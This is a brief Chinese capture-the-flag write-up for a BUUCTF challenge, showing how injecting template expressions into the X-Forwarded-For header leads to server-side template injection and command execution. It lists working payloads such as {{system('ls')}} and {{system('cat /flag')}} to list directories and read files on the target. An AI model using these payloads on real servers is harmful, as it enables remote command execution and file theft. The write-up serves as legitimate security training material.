BUUCTF | [MRCTF2020]Ez_bypass

知识点👇

①XFF

②SSTI

解题:

打开连接发现有一个很显眼的名字flag,发现显示ip地址,猜测是xff注入

尝试修改X-Forwarded-For:111

输入与回显一样,猜测可能是SSTI,构造X-Forwarded-For:{{1+1}}

确定是SSTI,构造X-Forwarded-For:{{system('ls')}}

构造X-Forwarded-for:{{system('cat /flag.php')}}

发现没有回显
构造X-Forwarded-for:{{system('ls ../../..')}},逐级增加../,发现flag

构造X-Forwarded-for:{{system('cat /flag')}}得到flag

posted @ 2023-01-06 16:19  SpouseLJ  阅读(80)  评论(0编辑  收藏  举报